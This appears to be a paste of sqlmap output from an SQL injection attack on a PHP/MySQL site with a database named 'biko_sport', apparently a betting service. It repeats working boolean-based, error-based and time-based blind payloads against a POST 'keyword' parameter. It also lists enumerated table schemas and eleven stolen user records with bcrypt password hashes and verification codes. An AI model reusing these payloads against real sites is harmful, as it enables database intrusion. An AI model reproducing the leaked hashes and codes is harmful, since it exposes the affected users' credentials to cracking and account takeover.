- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile_setting
- [10 columns]
- +--------------------+---------------+
- | Column | Type |
- +--------------------+---------------+
- | balance | decimal(10,2) |
- | created | datetime |
- | name | varchar(255) |
- | password | text |
- | profile_id | int(20) |
- | profile_setting_id |
- | reference_id | varchar(20) |
- | status | int(1) |
- | updated_at | timestamp |
- | verification_code | int(11) |
- +--------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile_settings
- [14 columns]
- +------------------------+---------------+
- | Column | Type |
- +------------------------+---------------+
- | balance | bigint(20) |
- | created_at | timestamp |
- | max_daily_possible_win | decimal(10,2) |
- | max_stake | decimal(10,2) |
- | multibet_bet_max_stake | decimal(10,2) |
- | name | varchar(250) |
- | password | text |
- | profile_id | bigint(20) |
- | profile_setting_id | bigint(20) |
- | reference_id | varchar(20) |
- | single_bet_max_stake | decimal(10,2) |
- | status | smallint(1) |
- | updated_at | timestamp |
- | verification_code | int(11) |
- +------------------------+---------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile_settings
- [11 entries]
- +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
- | profile_id | reference_id | profile_setting_id | name | status | balance | password | max_stake | created_at | updated_at | verification_code | single_bet_max_stake | max_daily_possible_win | multibet_bet_max_stake |
- +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
- | 6 | | 7 | NULL | 1 | 0 | $2y$08$QmE3T0hoL2FMckF3eGxKa.SRpg/OzLlHLsC8dHMadpeXGCdmDqLpW | 0.00 | 2018-02-01 14:02:39 | 2018-02-06 00:37:27 | 3766 | 0.00 | 0.00 | 0.00 |
- | 7 | | 5 | NULL | 1 | 0 | $2y$08$eTB0Umw5MzVLTTZaOWtSau/xZaFq4ZOdqJc3wdk.1dEISha0D.z3u | 0.00 | 2018-02-01 12:13:56 | 2018-02-01 12:15:36 | 2516 | 0.00 | 0.00 | 0.00 |
- | 8 | DESKTOP | 3 | NULL | 1 | 0 | $2y$08$TWtoNzBGbmpNVU1laEdpeeiYg4Ig6GEu.ZeqsK78NS0NZbE/CTEza | 0.00 | 2018-01-31 03:34:07 | 2018-02-08 19:06:52 | 2270 | 0.00 | 0.00 | 0.00 |
- | 9 | DESKTOP | 1129 | NULL | 1 | 0 | $2y$08$aXZZalVjNDFSL0J4dmlGZuJZZqFc8wSmH0SePTX3Q.x97gV8MVIyy | 0.00 | 2018-02-08 00:04:20 | 2018-02-08 00:04:40 | 1810 | 0.00 | 0.00 | 0.00 |
- | 10 | DESKTOP | 138 | NULL | 1 | 0 | $2y$08$SWplQm5vanBzdUFjVktPV.XVoKmOjB.OdHZZPDKdPF1m6R2/Ahgwi | 0.00 | 2018-02-04 08:49:47 | 2018-02-11 17:34:40 | 3164 | 0.00 | 0.00 | 0.00 |
- | 14 | | 8 | NULL | 1 | 0 | $2y$08$aUJkbXRlY0NnOG1aRUdGOOu6ibKFdsY9unrSvnLW6ObzeaKqeUEJ. | 0.00 | 2018-02-01 16:43:58 | 2018-02-01 16:44:35 | 9961 | 0.00 | 0.00 | 0.00 |
- | 17 | DESKTOP | 1 | NULL | 0 | 0 | $2y$08$Z1NuQzN1cFduaTAxSVVPWeWPXHJAybuDcGayvkRWxTegtvKksWzPC | 0.00 | 2018-01-30 17:50:36 | 2018-01-30 17:50:36 | 1180 | 0.00 | 0.00 | 0.00 |
- | 18 | | 9 | NULL | 1 | 0 | $2y$08$Y04zb2ZqNk1WZG5aaXFEUONme.ZoHkgcGMzM7SIzeMeuTbXFBt8pO | 0.00 | 2018-02-01 18:13:40 | 2018-02-01 18:14:48 | 2754 | 0.00 | 0.00 | 0.00 |
- | 19 | DESKTOP | 4 | NULL | 1 | 0 | $2y$08$V2NEdjNxT3p1elp4N05aVuzXtE8ebQX4QB/trva5bag0.kgYXaU3m | 0.00 | 2018-01-31 15:30:46 | 2018-02-01 20:30:31 | 2075 | 0.00 | 0.00 | 0.00 |
- | 20 | DESKTOP | 2 | NULL | 0 | 0 | $2y$08$RDVEQytaV1BYVFQ1aXFkM.6X0u6eyARqnOUTWry20VlYGjZ1n15/i | 0.00 | 2018-01-30 17:51:31 | 2018-01-30 17:51:31 | 1942 | 0.00 | 0.00 | 0.00 |
- | 21 | DESKTOP | 13 | NULL | 1 | 0 | $2y$08$ZWpvaDRHdElaVGtiWUY0QuK0Jxvb7pmCKELX2CjwpVnUzlJL2.rw2 | 0.00 | 2018-02-02 14:11:32 | 2018-02-11 15:45:04 | 2993 | 0.00 | 0.00 | 0.00 |
- +------------+--------------+--------------------+------+--------+---------+--------------------------------------------------------------+-----------+---------------------+---------------------+-------------------+----------------------+------------------------+------------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: profile_setting
- [0 entries]
- +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
- | profile_id | reference_id | profile_setting_id | name | status | created | balance | password | updated_at | verification_code |
- +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
- +------------+--------------+--------------------+------+--------+---------+---------+----------+------------+-------------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: backup_profile
- [0 entries]
- +------------+--------+--------+---------+---------+----------+------------+
- | profile_id | status | msisdn | network | created | modified | created_by |
- +------------+--------+--------+---------+---------+----------+------------+
- +------------+--------+--------+---------+---------+----------+------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: account_freeze
- [5 columns]
- +-------------------+-------------+
- | Column | Type |
- +-------------------+-------------+
- | account_freeze_id | bigint(20) |
- | created | datetime |
- | modified | timestamp |
- | msisdn | varchar(50) |
- | status | tinyint(4) |
- +-------------------+-------------+
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: keyword
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND 9185=9185 AND '%'='
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: keyword=arsenal%' AND (SELECT 9751 FROM(SELECT COUNT(*),CONCAT(0x3a6361703a,(SELECT (CASE WHEN (9751=9751) THEN 1 ELSE 0 END)),0x3a7564703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: keyword=arsenal%' AND SLEEP(5) AND '%'='
- ---
- web application technology: PHP 5.6.33, Nginx
- back-end DBMS: MySQL 5.0
- Database: biko_sport
- Table: msi
- [1 column]
- +--------+------------+
- | Column | Type |
- +--------+------------+
- | number | bigint(20) |
- +--------+------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement